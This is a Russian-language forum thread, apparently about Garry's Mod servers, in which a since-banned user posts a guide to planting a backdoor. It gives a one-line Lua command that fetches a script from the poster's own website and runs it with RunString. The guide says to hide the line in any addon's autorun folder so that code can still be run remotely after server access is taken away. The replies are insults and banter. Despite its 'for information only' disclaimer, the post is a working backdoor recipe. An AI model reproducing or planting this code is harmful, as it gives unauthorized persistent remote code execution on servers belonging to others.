Гайд 🧡 Как загрузить бекдур на сервер

  • LauX
  • Заблокирован
  • 678
  • 12
  • 232
Контакты для связи отсутствуют.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
⚠️ Данная тема создана исключительно в ознакомительных целях. Цель темы: Поставить разработчиков серверов в известность о том, что такая уязвимость существует и помочь им справится с недочётом. Я не призываю никого к выполнению действий

Что делает код?
Код отправляет запрос на ваш сайт и получает информацию с созданного на нём lua / txt или прочего файла. Код при помощи http.Fetch обращается к сайту, а он в свою очередь отдаёт скрипту информацию с файла. RunString запускает полученные данные с сайта.

Код:
concommand.Add("com", function() http.Fetch("https://ваш_сайт.com/название_файла.lua", RunString) end)

Использование / Установка
Далее закидываем строчку кода в любой аддон по пути lua/autorun/sv/файл.lua
В нужный вам момент прописываем в клиентскую консоль: "com" и файл запуститься.


Чем это полезно?
Полезно это тем, что даже если у вас заберут доступ к серверу, то вы сможете удалённо выбирать и загружать всё то, что вам захочется.

Медиа (Пример использования)
В медии ниже я показал то, как запускается небольшой lua скрипт с вашего сайта
 
  • 51
  • 6
Контакты для связи отсутствуют.
Как-то слишком просто, если честно
 
  • LauX
  • Заблокирован
  • 678
  • 12
  • 232
Контакты для связи отсутствуют.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
  • Ахах
Реакции: Jock
  • 164
  • 13
  • 20
Ты блять открыл галактику, ведь человек у которого есть бекдор наверника незнает что его можно сунуть в серверную часть.
 
  • LauX
  • Заблокирован
  • 678
  • 12
  • 232
Контакты для связи отсутствуют.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Ты блять открыл галактику, ведь человек у которого есть бекдор наверника незнает что его можно сунуть в серверную часть.
Для этого и создана данная тема. Учитывая тот факт, что если я тебе позвоню в дискорде и дам базовую задачу для джунов, то ты не сможешь даже её выполнить. Поэтому крайне советую перестать позорится и писать что-либо
 
  • 164
  • 13
  • 20
Для этого и создана данная тема. Учитывая тот факт, что если я тебе позвоню в дискорде и дам базовую задачу для джунов, то ты не сможешь даже её выполнить. Поэтому крайне советую перестать позорится и писать что-либо
Учитывая тот факт, что если я тебе позвоню в дискорде и дам базовую задачу для джунов, то ты не сможешь даже её выполнить. Поэтому крайне советую перестать позорится и писать что-либо
 
  • LauX
  • Заблокирован
  • 678
  • 12
  • 232
Контакты для связи отсутствуют.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Учитывая тот факт, что если я тебе позвоню в дискорде и дам базовую задачу для джунов, то ты не сможешь даже её выполнить. Поэтому крайне советую перестать позорится и писать что-либо
вот и всё, ты слился
 
Активность
Пока что здесь никого нет
Сверху Снизу